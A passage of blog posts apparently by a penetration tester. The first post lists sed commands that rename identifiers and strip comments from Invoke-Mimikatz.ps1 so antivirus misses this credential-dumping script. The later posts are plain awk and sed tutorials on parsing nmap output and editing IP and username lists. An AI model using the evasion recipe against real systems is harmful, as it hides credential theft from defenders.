Avoiding AV detection when running mimikatz with sed!

In this post I will be talking about avoiding AV detection when running mimikatz with sed! I came across this on the BlackHills Information Security Website, link here. Props to Carrie Roberts for sharing this. The classic Invoke-Mimikatz.ps1 from the PowerSploit suite located here, does get detected by many Anti-Virus vendors. This really is a great for the Enterprise. However whats not so great is the way in which AV vendors are detecting it and how it can be easily bypassed! Yes AV can easily be bypassed by modifying the powershell file. Using ‘sed’ in bash we can swap out various text in the ps1 file. For example swapping out mimikatz for mimidogz as in line 1 below.

I have talked about slowing down attackers who are using mimikatz in this post. This is where we can deny access to the clear text credentials in early versions of Windows (up to windows 7). In later versions of windows (8 and above) we can deny access to the hash and the clear text credentials. This will only slow attackers down though as the OS can be modified, however this will make noise on the network. This is really is a must for slowing down attackers. Harden your systems!

Below are the sed commands:

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1

 

Awk – Part 1 – Printing the 5th word in a line of text to std output

AWK

To kick off ‘Project Bash’ located here I’m going to be talking about Awk. Awk is a text processing tool that can be used to manipulate text in a line in bash. There are many uses of awk so I have called this one Part 1. In Part 1 we are going to use awk to select a word in a line of text, this can be very useful if we want a specific value in a line of text like the 5th word and want to iterate that through each line in a file. Take the following example:

So we have just used Nmap to ping sweep a subnet and want to create a target IP list from the results, we send the output to a file called alive.txt. check out the below:

Awk Part 1

If we break the command down:

cat alive.txt | grep "report" | awk '{print $5}'

The first command ‘Cat alive.txt’ prints out the contents of the file alive.txt to std output (ie into bash). We then pipe the out to a second command. We then use the command ‘grep “report”‘ to find all lines with the word ‘report’ in:

Nmap scan report for 10.0.2.15

Then finally using ‘awk ‘{print $5}’ to print the 5th word in the line using the variable $5.

Changing the variable in the awk command to ‘$2’ prints the 2nd word in the line:

As you will probably agree this is powerful tool, especially when you need to clean up some out. There are multiple ways we can do the above this is just one of them. Ace!

Sed – Part 2 – Using Sed To remove text from a line in linux

How do we remove specific text from each line in a text file in Linux? In this post we cover using Sed to remove text from a line in Linux.

Sed to remove text from a line in linuxWe previously covered in this post adding text to a line in Linux. In this post we will be specifically talking about the opposite. Using Sed to remove text from a line in linux is fairly straight forward. To remove specific characters or portion of text from a line in Linux we can use command line bash tool sed. The tool sed is used to perform basic text transformations, more info on sed can be found here. In the below example we want to specifically remove ‘BARRY\’ from a line everything within the square brackets [text to remove] is removed, so we use:

sed 's/[BARRY\]//g'

example:

cat users | grep BARRY | cut -d" " -f 2 | sed 's/[BARRY\]//g'

Hopefully you will find this useful!

Sed – Part 1 – How to add a word/text to the end of each line of a file in Linux

Using sed to add text to the end of each line in Linux.

sed to add text to the end of each line in LinuxIn this example we are going to use sed to add text to the end of each line in Linux. More specifically in a text file in Linux using a bash one liner! Why would we want to do this? Multiple reasons if your penetration tester. Creating user name lists or adding ports to the end of IP addresses for example. Sed is used to perform basic text transformations you can read more about it here.

So for example if we wanted to add ‘:80’ to the end of each line for a list of IP address we would do the following:

for example

sed ‘s/$/:80/’ IP.txt >  new_IP.txt

~$cat IP.txt 
192.168.0.1
192.168.0.2
192.168.0.3
192.168.0.4
192.168.0.5
~$sed 's/$/:80/' IP.txt > new_IP.txt
~$cat new_IP.txt 
192.168.0.1:80
192.168.0.2:80
192.168.0.3:80
192.168.0.4:80
192.168.0.5:80

Or  if we found we wanted to add ‘adm’ to the end of each line in a list of user names we would also use sed.

~$cat admins.txt 
adam
bob
bill
james
jane
~$sed 's/$/adm/' admins.txt > new_admins.txt
~$cat new_admins.txt 
adamadm
bobadm
billadm
jamesadm
janeadm
~$

Having these small bash commands to hand is super useful. As a penetration tester I am always find that I need to script something in Bash or PowerShell or needing to produce one liners. Having these commands to ready and waiting saves time looking them up. Hopefully you will also find them useful. Don’t forget the man pages for bash commands. Practice, practice and more practice.